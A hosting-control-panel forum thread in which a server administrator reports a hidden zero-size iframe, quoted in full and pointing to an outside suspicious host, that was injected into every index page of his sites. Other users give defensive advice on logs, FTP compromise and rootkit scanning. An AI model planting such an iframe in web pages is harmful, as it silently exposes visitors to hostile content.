• Our team is looking to connect with folks who use email services provided by Plesk, or a premium service. If you'd like to be part of the discovery process and share your experiences, we invite you to complete this short screening survey. If your responses match the persona we are looking for, you'll receive a link to schedule a call at your convenience. We look forward to hearing from you!
  • The BIND DNS server has already been deprecated and removed from Plesk for Windows.
    If a Plesk for Windows server is still using BIND, the upgrade to Plesk Obsidian 18.0.70 will be unavailable until the administrator switches the DNS server to Microsoft DNS. We strongly recommend transitioning to Microsoft DNS within the next 6 weeks, before the Plesk 18.0.70 release.
  • The Horde component is removed from Plesk Installer. We recommend switching to another webmail software supported in Plesk.

Server Attack¿? maliciusus code

L

LuisA

New Pleskian
hi everione, first im sorrry for my bad english
i have a dedicated server with plesk 9.2, days ago i see this code in all pages in my server, i have 16 sites allowed but i see in all index pages (first and second level )


<!-- ~ --><iframe src="http://livelnternet.net/s/in.cgi?3" width="0" height="0" style="display:none"></iframe><!-- ~ -->

that code was include in all index pages of all sites of my server,

i remove one by one... how i can stop that type of attack? how i can make a scritp to find that code in all pages allowed in my server?

Thanks
 
Hi,

check you logfiles to determine the entry point. This behaviour is mostly originated in hacked FTP accounts – so have a look at you xferlogs to determine the account. If you cannot find anything there this could have been caused by injection & co. – maybe some kind of script-based shell was placed onto your server. Try to find it with rkithunter and check access logs to determine the hacked domain and update any outdated software. I'm pretty sure that one of those steps above will lead to success. The hardest thing is to close the security hole – some months ago I had a similar issue which finally was caused by a compromised client PC (a reseller's machine) which stored a lot of FTP passwords, even from other client accounts.

So… Good Luck!
 
Indicative of either multiple FTP accounts compromised, or the system has been compromised as the root user.

In regard to FTP events, where your users account(s) are getting compromised we added clamav support to the psa-proftpd daemon in ASL. This can help out a lot if your users credentials being compromised is a recurring problem.
 
You must log in or register to reply here.

Similar threads

S
Issue Need Help Whitelisting GTM Noscript in Comodo WAF Rule 214540 on Plesk
Replies
1
Views
326
alvarezcruz
alvarezcruz
A
Question Plesk firewall - CrowdSec iptables interaction
Replies
3
Views
487
andg
A
Daveo
Question Cloudflare/Plesk with home server
Replies
2
Views
266
Daveo
Daveo
Dmytro
Issue Slave dns do not work on some servers
Replies
2
Views
484
Dmytro
Dmytro
A
Issue Website Intermittently Showing "Runtime Error" and "Site Can't Be Reached"
Replies
1
Views
668
scsa20
scsa20
Back
Top